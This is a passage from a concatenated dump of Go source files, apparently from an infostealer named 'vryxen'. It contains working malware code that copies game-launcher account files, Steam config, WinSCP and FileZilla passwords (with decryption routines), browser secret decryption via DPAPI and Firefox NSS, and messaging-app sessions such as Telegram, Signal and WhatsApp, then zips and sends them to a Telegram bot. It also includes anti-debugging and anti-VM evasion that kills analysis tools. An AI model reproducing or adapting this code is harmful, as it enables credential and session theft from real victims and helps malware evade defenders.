"cheatbreaker_accounts.json"), 28 | "Microsoft Store": filepath.Join(user, "AppData", "Roaming", ".minecraft", "launcher_accounts_microsoft_store.json"), 29 | "Rise": filepath.Join(user, "AppData", "Roaming", ".minecraft", "Rise", "alts.txt"), 30 | "Rise (Intent)": filepath.Join(user, "intentlauncher", "Rise", "alts.txt"), 31 | "Paladium": filepath.Join(user, "AppData", "Roaming", "paladium-group", "accounts.json"), 32 | "PolyMC": filepath.Join(user, "AppData", "Roaming", "PolyMC", "accounts.json"), 33 | "Badlion": filepath.Join(user, "AppData", "Roaming", "Badlion Client", "accounts.json"), 34 | }, 35 | "Riot Games": { 36 | "Config": filepath.Join(user, "AppData", "Local", "Riot Games", "Riot Client", "Config"), 37 | "Data": filepath.Join(user, "AppData", "Local", "Riot Games", "Riot Client", "Data"), 38 | "Logs": filepath.Join(user, "AppData", "Local", "Riot Games", "Riot Client", "Logs"), 39 | }, 40 | "Uplay": { 41 | "Settings": filepath.Join(user, "AppData", "Local", "Ubisoft Game Launcher"), 42 | }, 43 | "NationsGlory": { 44 | "Local Storage": filepath.Join(user, "AppData", "Roaming", "NationsGlory", "Local Storage", "leveldb"), 45 | }, 46 | } 47 | 48 | tempDir := filepath.Join(os.TempDir(), fmt.Sprintf("games-%s", strings.Split(user, "\\")[2])) 49 | found := "" 50 | for name, path := range paths { 51 | dest := filepath.Join(tempDir, strings.Split(user, "\\")[2], name) 52 | 53 | if err := os.MkdirAll(dest, os.ModePerm); err != nil { 54 | continue 55 | } 56 | 57 | var err error 58 | 59 | for fName, fPath := range path { 60 | if filepath.Ext(fPath) != "" { 61 | os.MkdirAll(filepath.Join(dest, fName), os.ModePerm) 62 | err = fileutil.CopyFile(fPath, filepath.Join(dest, fName, filepath.Base(fPath))) 63 | } else { 64 | err = fileutil.CopyDir(fPath, filepath.Join(dest, fName)) 65 | } 66 | 67 | if err != nil { 68 | continue 69 | } 70 | 71 | if !strings.Contains(found, name) { 72 | found += fmt.Sprintf("\n+ %s ", name) 73 | } 74 | } 75 | 76 | } 77 | 78 | if found == "" { 79 | os.RemoveAll(tempDir) 80 | continue 81 | } 82 | 83 | tempZip := filepath.Join(os.TempDir(), "games.zip") 84 | 85 | if err := fileutil.Zip(tempDir, tempZip); err != nil { 86 | os.RemoveAll(tempDir) 87 | continue 88 | } 89 | 90 | message := "Games Stealer - " + strings.Split(user, "\\")[2] 91 | 92 | requests.Send2TelegramMessage(botToken, chatId, message) 93 | requests.Send2TelegramMessage(botToken, chatId, tempZip) 94 | 95 | os.RemoveAll(tempDir) 96 | os.Remove(tempZip) 97 | } 98 | 99 | tempDir := fmt.Sprintf("%s\\%s", os.TempDir(), "steam-temp") 100 | defer os.RemoveAll(tempDir) 101 | 102 | path := "C:\\Program Files (x86)\\Steam\\config" 103 | if !fileutil.IsDir(path) { 104 | return 105 | } 106 | 107 | if err := fileutil.CopyDir(path, tempDir); err != nil { 108 | return 109 | } 110 | 111 | tempZip := filepath.Join(os.TempDir(), "steam.zip") 112 | if err := fileutil.Zip(tempDir, tempZip); err != nil { 113 | return 114 | } 115 | defer os.Remove(tempZip) 116 | 117 | requests.Send2TelegramMessage(botToken, chatId, "Steam") 118 | requests.Send2TelegramDocument(botToken, chatId, tempZip) 119 | } -------------------------------------------------------------------------------- /internal/antidebug/antidebug.go: -------------------------------------------------------------------------------- 1 | package antidebug 2 | 3 | import ( 4 | "fmt" 5 | "os" 6 | "strings" 7 | "syscall" 8 | "unsafe" 9 | 10 | "github.com/shirou/gopsutil/v3/process" 11 | ) 12 | 13 | var ( 14 | user32DLL = syscall.NewLazyDLL("user32.dll") 15 | enumWindowsProc = user32DLL.NewProc("EnumWindows") 16 | getWindowText = user32DLL.NewProc("GetWindowTextA") 17 | getWindowThread = user32DLL.NewProc("GetWindowThreadProcessId") 18 | 19 | kernel32DLL = syscall.NewLazyDLL("kernel32.dll") 20 | isDebugger = kernel32DLL.NewProc("IsDebuggerPresent") 21 | debugString = kernel32DLL.NewProc("OutputDebugStringA") 22 | procOpenProcess = kernel32DLL.NewProc("OpenProcess") 23 | procTerminateProcess = kernel32DLL.NewProc("TerminateProcess") 24 | ) 25 | 26 | func terminateProcess(pid uint32) error { 27 | handle, _, _ := procOpenProcess.Call(syscall.PROCESS_TERMINATE, 0, uintptr(pid)) 28 | if handle == 0 { 29 | return fmt.Errorf("failed to open process") 30 | } 31 | defer syscall.CloseHandle(syscall.Handle(handle)) 32 | 33 | ret, _, _ := procTerminateProcess.Call(handle, 0) 34 | if ret == 0 { 35 | return fmt.Errorf("failed to terminate process") 36 | } 37 | return nil 38 | } 39 | 40 | func KillProcessesByNames(blacklist []string) error { 41 | processes, _ := process.Processes() 42 | 43 | for _, p := range processes { 44 | processName, _ := p.Name() 45 | 46 | if contains(blacklist, processName) { 47 | terminateProcess(uint32(p.Pid)) 48 | } 49 | } 50 | 51 | return nil 52 | } 53 | 54 | func getCallback(blacklist []string) uintptr { 55 | return syscall.NewCallback(func(hwnd syscall.Handle, lparam uintptr) uintptr { 56 | var title [256]byte 57 | 58 | getWindowText.Call(uintptr(hwnd), uintptr(unsafe.Pointer(&title)), uintptr(len(title))) 59 | 60 | titleStr := string(title[:]) 61 | 62 | if titleStr == "" { 63 | return 1 64 | } 65 | 66 | if contains(blacklist, titleStr) { 67 | var pid uint32 68 | getWindowThread.Call(uintptr(hwnd), uintptr(unsafe.Pointer(&pid))) 69 | 70 | terminateProcess(pid) 71 | 72 | } 73 | return 1 74 | }) 75 | } 76 | 77 | func KillProcessesByWindowsNames(callback uintptr) error { 78 | enumWindowsProc.Call(callback, 0) 79 | return nil 80 | } 81 | 82 | func IsDebuggerPresent() bool { 83 | flag, _, _ := isDebugger.Call() 84 | return flag != 0 85 | } 86 | 87 | func outputDebugString(message string) { 88 | debugString.Call(uintptr(unsafe.Pointer(syscall.StringToUTF16Ptr(message)))) 89 | } 90 | 91 | func OutputDebugStringAntiDebug() { 92 | outputDebugString("hm") 93 | } 94 | 95 | func OutputDebugStringOllyDbgExploit() { 96 | outputDebugString("%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s") 97 | } 98 | 99 | func contains(slice []string, processName string) bool { 100 | processName = strings.ToLower(processName) 101 | 102 | for _, s := range slice { 103 | if strings.Contains(processName, s) { 104 | return true 105 | } 106 | } 107 | 108 | return false 109 | } 110 | 111 | func Run() { 112 | if IsDebuggerPresent() { 113 | os.Exit(0) 114 | } 115 | 116 | blacklist := []string{ 117 | "ksdumperclient", "regedit", "ida64", "vmtoolsd", "vgauthservice", 118 | "wireshark", "x32dbg", "ollydbg", "vboxtray", "df5serv", "vmsrvc", 119 | "vmusrvc", "taskmgr", "vmwaretray", "xenservice", "pestudio", "vmwareservice", 120 | "qemu-ga", "prl_cc", "prl_tools", "cmd", 121 | "joeboxcontrol", "vmacthlp", "httpdebuggerui", "processhacker", 122 | "joeboxserver", "fakenet", "ksdumper", "vmwareuser", "fiddler", 123 | "x96dbg", "dumpcap", "vboxservice", 124 | } 125 | 126 | callback := getCallback([]string{ 127 | "simpleassemblyexplorer", "dojandqwklndoqwd", "procmon64", "process hacker", 128 | "sharpod", "http debugger", "dbgclr", "x32dbg", "sniffer", "petools", 129 | "simpleassembly", "ksdumper", "dnspy", "x96dbg", "de4dot", "exeinfope", 130 | "windbg", "mdb", "harmony", "systemexplorerservice", "megadumper", 131 | "system explorer", "mdbg", "kdb", "charles", "stringdecryptor", "phantom", 132 | "debugger", "extremedumper", "pc-ret", "folderchangesview", "james", 133 | "process monitor", "protection_id", "de4dotmodded", "x32_dbg", "pizza", "fiddler", 134 | "x64_dbg", "httpanalyzer", "strongod", "wireshark", "gdb", "graywolf", "x64dbg", 135 | "ksdumper v1.1 - by equifox", "wpe pro", "ilspy", "dbx", "ollydbg", "x64netdumper", 136 | "scyllahide", "kgdb", "systemexplorer", "proxifier", "debug", "httpdebug", 137 | "httpdebugger", "0harmony", "mitmproxy", "ida -", 138 | "codecracker", "ghidra", "titanhide", "hxd", "reversal", 139 | }) 140 | 141 | for { 142 | OutputDebugStringAntiDebug() 143 | OutputDebugStringOllyDbgExploit() 144 | 145 | KillProcessesByNames(blacklist) 146 | KillProcessesByWindowsNames(callback) 147 | } 148 | } -------------------------------------------------------------------------------- /internal/antivm/antivm.go: -------------------------------------------------------------------------------- 1 | package AntiVMAnalysis 2 | 3 | import ( 4 | "bytes" 5 | "io/ioutil" 6 | "log" 7 | "os" 8 | "os/exec" 9 | "path/filepath" 10 | "strings" 11 | "syscall" 12 | ) 13 | 14 | func AntiVMCheckAndExist() { 15 | if kvmDetected, err := CheckForKVM(); kvmDetected || err != nil { 16 | log.Fatalf("VM detectipn failed: KVM detected or error occurred: %v", err) 17 | } 18 | 19 | if smallScreen, err := IsScreenSmall(); smallScreen || err != nil { 20 | log.Fatalf("VM detection failed: Small screen size or error occurred: %v", err) 21 | } 22 | 23 | if qemuDetected, err := CheckForQEMU(); qemuDetected || err != nil { 24 | log.Fatalf("VM detection failed: QEMU detected or error occurred: %v", err) 25 | } 26 | 27 | if taskCheckFailed, err := TaskCheck(); taskCheckFailed || err != nil { 28 | log.Fatalf("VM detection failed: Suspicious task activity or error occurred: %v", err) 29 | } 30 | 31 | if blacklistedNameDetected := CheckForBlacklistedNames(); blacklistedNameDetected { 32 | log.Fatalf("VM detection failed: Blacklisted username detected") 33 | } 34 | 35 | if vmArtifactsDetected := VMArtifactsDetect(); vmArtifactsDetected { 36 | log.Fatalf("VM detection failed: VM-related artifacts detected") 37 | } 38 | 39 | if sysmonRunning := CheckForSysmon(); sysmonRunning { 40 | log.Fatalf("VM detection failed: Sysmon is running") 41 | } 42 | } 43 | 44 | func CheckForKVM() (bool, error) { 45 | badDrivers := []string{"balloon.sys", "netkvm.sys", "vioinput", "viofs.sys", "vioser.sys"} 46 | systemRoot := os.Getenv("SystemRoot") 47 | 48 | for _, driver := range badDrivers { 49 | matches, err := filepath.Glob(filepath.Join(systemRoot, "System32", driver)) 50 | if err != nil { 51 | log.Printf("Error accessing system files for %s: %v", driver, err) 52 | continue 53 | } 54 | if len(matches) > 0 { 55 | return true, nil 56 | } 57 | } 58 | return false, nil 59 | } 60 | 61 | func IsScreenSmall() (bool, error) { 62 | getSystemMetrics := syscall.NewLazyDLL("user32.dll").NewProc("GetSystemMetrics") 63 | width, _, _ := getSystemMetrics.Call(0) 64 | height, _, _ := getSystemMetrics.Call(1) 65 | 66 | return width < 800 || height < 600, nil 67 | } 68 | 69 | func CheckForQEMU() (bool, error) { 70 | qemuDrivers := []string{"qemu-ga", "qemuwmi"} 71 | system32Path := filepath.Join(os.Getenv("SystemRoot"), "System32") 72 | 73 | files, err := ioutil.ReadDir(system32Path) 74 | if err != nil { 75 | return false, err 76 | } 77 | 78 | for _, file := range files { 79 | for _, driver := range qemuDrivers { 80 | if strings.Contains(file.Name(), driver) { 81 | return true, nil 82 | } 83 | } 84 | } 85 | return false, nil 86 | } 87 | 88 | func TaskCheck() (bool, error) { 89 | cmd := exec.Command("tasklist") 90 | var out bytes.Buffer 91 | cmd.Stdout = &out 92 | cmd.SysProcAttr = &syscall.SysProcAttr{HideWindow: true} 93 | 94 | err := cmd.Run() 95 | if err != nil { 96 | log.Printf("Error running tasklist command: %v", err) 97 | return false, err 98 | } 99 | 100 | processCounts := make(map[string]int) 101 | for _, line := range strings.Split(out.String(), "\n") { 102 | fields := strings.Fields(line) 103 | if len(fields) > 0 { 104 | processName := fields[0] 105 | if processName != "svchost.exe" { 106 | processCounts[processName]++ 107 | } 108 | } 109 | } 110 | 111 | for _, count := range processCounts { 112 | if count > 60 { 113 | return true, nil 114 | } 115 | } 116 | return false, nil 117 | } 118 | 119 | func CheckForBlacklistedNames() bool { 120 | blacklistedNames := []string{ 121 | "Johnson", "Miller", "malware", "maltest", "CurrentUser", "Sandbox", "virus", "John Doe", 122 | "test user", "sand box", "WDAGUtilityAccount", "Bruno", "george", "Harry Johnson", 123 | } 124 | username := strings.ToLower(os.Getenv("USERNAME")) 125 | 126 | for _, name := range blacklistedNames { 127 | if username == strings.ToLower(name) { 128 | return true 129 | } 130 | } 131 | return false 132 | } 133 | 134 | func VMArtifactsDetect() bool { 135 | badFiles := []string{"VBoxMouse.sys", "VBoxGuest.sys", "VBoxSF.sys", "VBoxVideo.sys", "vmmouse.sys", "vboxogl.dll"} 136 | badDirs := []string{`C:\Program Files\VMware`, `C:\Program Files\oracle\virtualbox guest additions`} 137 | system32Path := filepath.Join(os.Getenv("SystemRoot"), "System32") 138 | 139 | files, err := ioutil.ReadDir(system32Path) 140 | if err != nil { 141 | log.Printf("Error accessing System32 folder: %v", err) 142 | return false 143 | } 144 | 145 | for _, file := range files { 146 | fileName := strings.ToLower(file.Name()) 147 | for _, badFile := range badFiles { 148 | if fileName == strings.ToLower(badFile) { 149 | return true 150 | } 151 | } 152 | } 153 | 154 | for _, badDir := range badDirs { 155 | if _, err := os.Stat(badDir); err == nil { 156 | return true 157 | } 158 | } 159 | 160 | return false 161 | } 162 | 163 | func CheckForSysmon() bool { 164 | cmd := exec.Command("tasklist") 165 | var out bytes.Buffer 166 | cmd.Stdout = &out 167 | cmd.SysProcAttr = &syscall.SysProcAttr{HideWindow: true} 168 | 169 | err := cmd.Run() 170 | if err != nil { 171 | log.Printf("Error running tasklist command: %v", err) 172 | return false 173 | } 174 | 175 | return strings.Contains(out.String(), "sysmon.exe") 176 | } 177 | 178 | func Check() { 179 | AntiVMCheckAndExist() 180 | } -------------------------------------------------------------------------------- /internal/core/ftps/ftps.go: -------------------------------------------------------------------------------- 1 | package ftps 2 | 3 | import ( 4 | "github.com/unf6/vryxen/pkg/utils/requests" 5 | "encoding/base64" 6 | "encoding/xml" 7 | "fmt" 8 | "os" 9 | "path/filepath" 10 | "strconv" 11 | "strings" 12 | 13 | "golang.org/x/sys/windows/registry" 14 | ) 15 | 16 | type LoginPair struct { 17 | Username string 18 | Password string 19 | Host string 20 | Port int 21 | } 22 | 23 | type WinSCP struct{} 24 | 25 | type FileZilla struct { 26 | XMLName xml.Name `xml:"FileZilla3"` 27 | RecentServers struct { 28 | Servers []Server `xml:"Server"` 29 | } `xml:"RecentServers"` 30 | } 31 | 32 | type Server struct { 33 | Host string `xml:"Host"` 34 | Port int `xml:"Port"` 35 | User string `xml:"User"` 36 | Pass string `xml:"Pass"` 37 | Encoding string `xml:"Pass,attr"` 38 | } 39 | 40 | func (w *WinSCP) ParseConnections() []LoginPair { 41 | var loginPairs []LoginPair 42 | key, err := registry.OpenKey(registry.CURRENT_USER, `SOFTWARE\Martin Prikryl\WinSCP 2\Sessions`, registry.ALL_ACCESS) 43 | if err != nil { 44 | if err == registry.ErrNotExist { 45 | return loginPairs 46 | } 47 | fmt.Println("Error opening registry key:", err) 48 | return loginPairs 49 | } 50 | defer key.Close() 51 | 52 | subKeys, err := key.ReadSubKeyNames(-1) 53 | if err != nil { 54 | fmt.Println("Error reading subkeys:", err) 55 | return loginPairs 56 | } 57 | 58 | for _, subKeyName := range subKeys { 59 | sessionKey, err := registry.OpenKey(registry.CURRENT_USER, `SOFTWARE\Martin Prikryl\WinSCP 2\Sessions\`+subKeyName, registry.READ) 60 | if err != nil { 61 | continue 62 | } 63 | defer sessionKey.Close() 64 | 65 | host, _, _ := sessionKey.GetStringValue("HostName") 66 | username, _, _ := sessionKey.GetStringValue("UserName") 67 | passwordEnc, _, _ := sessionKey.GetStringValue("Password") 68 | portUint, _, _ := sessionKey.GetIntegerValue("PortNumber") 69 | port := int(portUint) 70 | 71 | password := decryptPasswordWinSCP(username, passwordEnc, host) 72 | loginPairs = append(loginPairs, LoginPair{Username: username, Password: password, Host: host, Port: port}) 73 | } 74 | return loginPairs 75 | } 76 | 77 | func decodeNextChar(list *[]string) int { 78 | if len(*list) < 2 { 79 | return 0 80 | } 81 | first, _ := strconv.Atoi((*list)[0]) 82 | second, _ := strconv.Atoi((*list)[1]) 83 | return 255 ^ ((first<<4)+second^163)&255 84 | } 85 | 86 | func decryptPasswordWinSCP(user, pass, host string) string { 87 | if user == "" || pass == "" || host == "" { 88 | fmt.Println("Skipping decryption - empty user, pass, or host") 89 | return "" 90 | } 91 | 92 | list := strings.Split(pass, "") 93 | var digits []string 94 | for _, char := range list { 95 | switch char { 96 | case "A": 97 | digits = append(digits, "10") 98 | case "B": 99 | digits = append(digits, "11") 100 | case "C": 101 | digits = append(digits, "12") 102 | case "D": 103 | digits = append(digits, "13") 104 | case "E": 105 | digits = append(digits, "14") 106 | case "F": 107 | digits = append(digits, "15") 108 | default: 109 | digits = append(digits, char) 110 | } 111 | } 112 | 113 | if decodeNextChar(&digits) == 255 { 114 | decodeNextChar(&digits) 115 | } 116 | 117 | if len(digits) >= 4 { 118 | digits = digits[4:] 119 | } 120 | 121 | num2 := decodeNextChar(&digits) 122 | if len(digits) >= 2 { 123 | digits = digits[2:] 124 | } 125 | 126 | num3 := decodeNextChar(&digits) * 2 127 | if len(digits) >= num3 { 128 | digits = digits[num3:] 129 | } 130 | 131 | var result strings.Builder 132 | for i := -1; i < num2 && len(digits) >= 2; i++ { 133 | char := decodeNextChar(&digits) 134 | result.WriteByte(byte(char)) 135 | digits = digits[2:] 136 | } 137 | 138 | decrypted := result.String() 139 | prefix := user + host 140 | if idx := strings.Index(decrypted, prefix); idx != -1 { 141 | cleaned := strings.Replace(decrypted[idx:], prefix, "", 1) 142 | return cleaned 143 | } 144 | 145 | return decrypted 146 | } 147 | 148 | func parseFileZillaXML(filePath string) ([]LoginPair, error) { 149 | var loginPairs []LoginPair 150 | file, err := os.ReadFile(filePath) 151 | if err != nil { 152 | return nil, fmt.Errorf("error reading file: %v", err) 153 | } 154 | 155 | var fileZillaData FileZilla 156 | err = xml.Unmarshal(file, &fileZillaData) 157 | if err != nil { 158 | return nil, fmt.Errorf("error unmarshalling XML: %v", err) 159 | } 160 | 161 | for _, server := range fileZillaData.RecentServers.Servers { 162 | password := server.Pass 163 | decoded, err := base64.StdEncoding.DecodeString(password) 164 | if err == nil { 165 | password = string(decoded) 166 | } 167 | 168 | loginPairs = append(loginPairs, LoginPair{Host: server.Host, Port: server.Port, Username: server.User, Password: password}) 169 | } 170 | return loginPairs, nil 171 | } 172 | 173 | func Run(botToken, chatID string) { 174 | winscp := &WinSCP{} 175 | winscpPairs := winscp.ParseConnections() 176 | 177 | appData := os.Getenv("APPDATA") 178 | recentServersPath := filepath.Join(appData, "FileZilla", "recentservers.xml") 179 | fileZillaPairs, _ := parseFileZillaXML(recentServersPath) 180 | 181 | allCredentials := append(winscpPairs, fileZillaPairs...) 182 | 183 | for _, cred := range allCredentials { 184 | 185 | var message string 186 | if contains(winscpPairs, cred) { 187 | message = "WinSCP Credentials:\n" 188 | } else if contains(fileZillaPairs, cred) { 189 | message = "FileZilla Credentials:\n" 190 | } 191 | 192 | message += "Host: " + cred.Host + "\n" + 193 | "Port: " + strconv.Itoa(cred.Port) + "\n" + 194 | "Username: " + cred.Username + "\n" + 195 | "Password: " + cred.Password + "\n" 196 | 197 | requests.Send2TelegramMessage(botToken, chatID, message) 198 | } 199 | } 200 | 201 | func contains(slice []LoginPair, cred LoginPair) bool { 202 | for _, c := range slice { 203 | if c == cred { 204 | return true 205 | } 206 | } 207 | return false 208 | } 209 | -------------------------------------------------------------------------------- /internal/core/browsers/crypto.go: -------------------------------------------------------------------------------- 1 | package browsers 2 | 3 | import ( 4 | "crypto/aes" 5 | "crypto/cipher" 6 | "crypto/des" 7 | "crypto/hmac" 8 | "crypto/sha1" 9 | "crypto/sha256" 10 | "encoding/asn1" 11 | "errors" 12 | "syscall" 13 | "unsafe" 14 | 15 | "golang.org/x/crypto/pbkdf2" 16 | ) 17 | 18 | func DPAPI(encryptPass []byte) ([]byte, error) { 19 | dllCrypt := syscall.NewLazyDLL("Crypt32.dll") 20 | dllKernel := syscall.NewLazyDLL("Kernel32.dll") 21 | procDecryptData := dllCrypt.NewProc("CryptUnprotectData") 22 | procLocalFree := dllKernel.NewProc("LocalFree") 23 | 24 | type dataBlob struct { 25 | cbData uint32 26 | pbData *byte 27 | } 28 | 29 | var outBlob dataBlob 30 | var newBlob *dataBlob 31 | 32 | if len(encryptPass) == 0 { 33 | newBlob = &dataBlob{} 34 | } 35 | newBlob = &dataBlob{ 36 | pbData: &encryptPass[0], 37 | cbData: uint32(len(encryptPass)), 38 | } 39 | r, _, err := procDecryptData.Call(uintptr(unsafe.Pointer(newBlob)), 0, 0, 0, 0, 0, uintptr(unsafe.Pointer(&outBlob))) 40 | if r == 0 { 41 | return nil, err 42 | } 43 | defer procLocalFree.Call(uintptr(unsafe.Pointer(outBlob.pbData))) 44 | d := make([]byte, outBlob.cbData) 45 | copy(d, (*[1 << 30]byte)(unsafe.Pointer(outBlob.pbData))[:]) 46 | return d, nil 47 | } 48 | 49 | type ASN1PBE interface { 50 | Decrypt(globalSalt, masterPwd []byte) (key []byte, err error) 51 | } 52 | 53 | func NewASN1PBE(b []byte) (pbe ASN1PBE, err error) { 54 | var ( 55 | n nssPBE 56 | m metaPBE 57 | l loginPBE 58 | ) 59 | if _, err := asn1.Unmarshal(b, &n); err == nil { 60 | return n, nil 61 | } 62 | if _, err := asn1.Unmarshal(b, &m); err == nil { 63 | return m, nil 64 | } 65 | if _, err := asn1.Unmarshal(b, &l); err == nil { 66 | return l, nil 67 | } 68 | return nil, errors.New("decode ASN1 data failed") 69 | } 70 | 71 | type nssPBE struct { 72 | AlgoAttr struct { 73 | asn1.ObjectIdentifier 74 | SaltAttr struct { 75 | EntrySalt []byte 76 | Len int 77 | } 78 | } 79 | Encrypted []byte 80 | } 81 | 82 | func (n nssPBE) Decrypt(globalSalt, masterPwd []byte) (key []byte, err error) { 83 | hp := sha1.Sum(append(globalSalt, masterPwd...)) 84 | s := append(hp[:], n.salt()...) 85 | chp := sha1.Sum(s) 86 | pes := paddingZero(n.salt(), 20) 87 | tk := hmac.New(sha1.New, chp[:]) 88 | tk.Write(pes) 89 | pes = append(pes, n.salt()...) 90 | k1 := hmac.New(sha1.New, chp[:]) 91 | k1.Write(pes) 92 | tkPlus := append(tk.Sum(nil), n.salt()...) 93 | k2 := hmac.New(sha1.New, chp[:]) 94 | k2.Write(tkPlus) 95 | k := append(k1.Sum(nil), k2.Sum(nil)...) 96 | iv := k[len(k)-8:] 97 | return des3Decrypt(k[:24], iv, n.encrypted()) 98 | } 99 | 100 | func (n nssPBE) salt() []byte { 101 | return n.AlgoAttr.SaltAttr.EntrySalt 102 | } 103 | 104 | func (n nssPBE) encrypted() []byte { 105 | return n.Encrypted 106 | } 107 | 108 | type metaPBE struct { 109 | AlgoAttr algoAttr 110 | Encrypted []byte 111 | } 112 | 113 | type algoAttr struct { 114 | asn1.ObjectIdentifier 115 | Data struct { 116 | Data struct { 117 | asn1.ObjectIdentifier 118 | SlatAttr slatAttr 119 | } 120 | IVData ivAttr 121 | } 122 | } 123 | 124 | type ivAttr struct { 125 | asn1.ObjectIdentifier 126 | IV []byte 127 | } 128 | 129 | type slatAttr struct { 130 | EntrySalt []byte 131 | IterationCount int 132 | KeySize int 133 | Algorithm struct { 134 | asn1.ObjectIdentifier 135 | } 136 | } 137 | 138 | func (m metaPBE) Decrypt(globalSalt, _ []byte) (key2 []byte, err error) { 139 | k := sha1.Sum(globalSalt) 140 | key := pbkdf2.Key(k[:], m.salt(), m.iterationCount(), m.keySize(), sha256.New) 141 | iv := append([]byte{4, 14}, m.iv()...) 142 | return aes128CBCDecrypt(key, iv, m.encrypted()) 143 | } 144 | 145 | func (m metaPBE) salt() []byte { 146 | return m.AlgoAttr.Data.Data.SlatAttr.EntrySalt 147 | } 148 | 149 | func (m metaPBE) iterationCount() int { 150 | return m.AlgoAttr.Data.Data.SlatAttr.IterationCount 151 | } 152 | 153 | func (m metaPBE) keySize() int { 154 | return m.AlgoAttr.Data.Data.SlatAttr.KeySize 155 | } 156 | 157 | func (m metaPBE) iv() []byte { 158 | return m.AlgoAttr.Data.IVData.IV 159 | } 160 | 161 | func (m metaPBE) encrypted() []byte { 162 | return m.Encrypted 163 | } 164 | 165 | type loginPBE struct { 166 | CipherText []byte 167 | Data struct { 168 | asn1.ObjectIdentifier 169 | IV []byte 170 | } 171 | Encrypted []byte 172 | } 173 | 174 | func (l loginPBE) Decrypt(globalSalt, _ []byte) (key []byte, err error) { 175 | return des3Decrypt(globalSalt, l.iv(), l.encrypted()) 176 | } 177 | 178 | func (l loginPBE) iv() []byte { 179 | return l.Data.IV 180 | } 181 | 182 | func (l loginPBE) encrypted() []byte { 183 | return l.Encrypted 184 | } 185 | 186 | func aes128CBCDecrypt(key, iv, encryptPass []byte) ([]byte, error) { 187 | block, err := aes.NewCipher(key) 188 | if err != nil { 189 | return nil, err 190 | } 191 | encryptLen := len(encryptPass) 192 | if encryptLen < block.BlockSize() { 193 | return nil, errors.New("length of encrypted password less than block size") 194 | } 195 | 196 | dst := make([]byte, encryptLen) 197 | mode := cipher.NewCBCDecrypter(block, iv) 198 | mode.CryptBlocks(dst, encryptPass) 199 | dst = pkcs5UnPadding(dst, block.BlockSize()) 200 | return dst, nil 201 | } 202 | 203 | func pkcs5UnPadding(src []byte, blockSize int) []byte { 204 | n := len(src) 205 | paddingNum := int(src[n-1]) 206 | if n < paddingNum || paddingNum > blockSize { 207 | return src 208 | } 209 | return src[:n-paddingNum] 210 | } 211 | 212 | func des3Decrypt(key, iv []byte, src []byte) ([]byte, error) { 213 | block, err := des.NewTripleDESCipher(key) 214 | if err != nil { 215 | return nil, err 216 | } 217 | blockMode := cipher.NewCBCDecrypter(block, iv) 218 | sq := make([]byte, len(src)) 219 | blockMode.CryptBlocks(sq, src) 220 | return pkcs5UnPadding(sq, block.BlockSize()), nil 221 | } 222 | 223 | func paddingZero(s []byte, l int) []byte { 224 | h := l - len(s) 225 | if h <= 0 { 226 | return s 227 | } 228 | for i := len(s); i < l; i++ { 229 | s = append(s, 0) 230 | } 231 | return s 232 | } -------------------------------------------------------------------------------- /internal/core/socials/socials.go: -------------------------------------------------------------------------------- 1 | package Socials 2 | 3 | import ( 4 | "os" 5 | "os/exec" 6 | "path/filepath" 7 | "fmt" 8 | "github.com/unf6/vryxen/pkg/utils/fileutil" 9 | "github.com/unf6/vryxen/pkg/utils/requests" 10 | ) 11 | 12 | func Run(botToken, chatId string) { 13 | folderMessaging := filepath.Join(os.Getenv("TEMP"), "Vryxen", "SocialMedias") 14 | skypeStealer(folderMessaging) 15 | pidginStealer(folderMessaging) 16 | toxStealer(folderMessaging) 17 | telegramStealer(folderMessaging) 18 | elementStealer(folderMessaging) 19 | icqStealer(folderMessaging) 20 | signalStealer(folderMessaging) 21 | viberStealer(folderMessaging) 22 | whatsappStealer(folderMessaging) 23 | 24 | tempZip := filepath.Join(folderMessaging, "Socials.zip") 25 | if err := fileutil.Zip(folderMessaging, tempZip); err != nil { 26 | return 27 | } 28 | 29 | message := fmt.Sprintf("Socials: %s", fileutil.Tree(folderMessaging, "")) 30 | 31 | requests.Send2TelegramMessage(botToken, chatId, message) 32 | requests.Send2TelegramDocument(botToken, chatId, tempZip) 33 | 34 | } 35 | 36 | func skypeStealer(folderMessaging string) { 37 | skypeFolder := filepath.Join(os.Getenv("APPDATA"), "microsoft", "skype for desktop") 38 | if _, err := os.Stat(skypeFolder); os.IsNotExist(err) { 39 | return 40 | } 41 | skypeSession := filepath.Join(folderMessaging, "Skype") 42 | os.MkdirAll(skypeSession, os.ModePerm) 43 | fileutil.CopyDir(skypeFolder, skypeSession) 44 | } 45 | 46 | func pidginStealer(folderMessaging string) { 47 | pidginFolder := filepath.Join(os.Getenv("USERPROFILE"), "AppData", "Roaming", ".purple") 48 | if _, err := os.Stat(pidginFolder); os.IsNotExist(err) { 49 | return 50 | } 51 | pidginAccounts := filepath.Join(folderMessaging, "Pidgin") 52 | os.MkdirAll(pidginAccounts, os.ModePerm) 53 | accountsFile := filepath.Join(pidginFolder, "accounts.xml") 54 | fileutil.CopyFile(accountsFile, pidginAccounts) 55 | } 56 | 57 | func toxStealer(folderMessaging string) { 58 | toxFolder := filepath.Join(os.Getenv("APPDATA"), "Tox") 59 | if _, err := os.Stat(toxFolder); os.IsNotExist(err) { 60 | return 61 | } 62 | toxSession := filepath.Join(folderMessaging, "Tox") 63 | os.MkdirAll(toxSession, os.ModePerm) 64 | fileutil.CopyDir(toxFolder, toxSession) 65 | } 66 | 67 | func telegramStealer(folderMessaging string) { 68 | processName := "telegram" 69 | pathtele := filepath.Join(os.Getenv("USERPROFILE"), "AppData", "Roaming", "Telegram Desktop", "tdata") 70 | if _, err := os.Stat(pathtele); os.IsNotExist(err) { 71 | return 72 | } 73 | cmd := exec.Command("taskkill", "/F", "/IM", processName+".exe") 74 | cmd.Run() 75 | 76 | telegramSession := filepath.Join(folderMessaging, "Telegram") 77 | os.MkdirAll(telegramSession, os.ModePerm) 78 | fileutil.CopyDir(pathtele, telegramSession) 79 | 80 | cmd = exec.Command("start", pathtele) 81 | cmd.Run() 82 | } 83 | 84 | func elementStealer(folderMessaging string) { 85 | elementFolder := filepath.Join(os.Getenv("USERPROFILE"), "AppData", "Roaming", "Element") 86 | if _, err := os.Stat(elementFolder); os.IsNotExist(err) { 87 | return 88 | } 89 | elementSession := filepath.Join(folderMessaging, "Element") 90 | os.MkdirAll(elementSession, os.ModePerm) 91 | indexedDB := filepath.Join(elementFolder, "IndexedDB") 92 | fileutil.CopyDir(indexedDB, elementSession) 93 | localStorage := filepath.Join(elementFolder, "Local Storage") 94 | fileutil.CopyDir(localStorage, elementSession) 95 | } 96 | 97 | func icqStealer(folderMessaging string) { 98 | icqFolder := 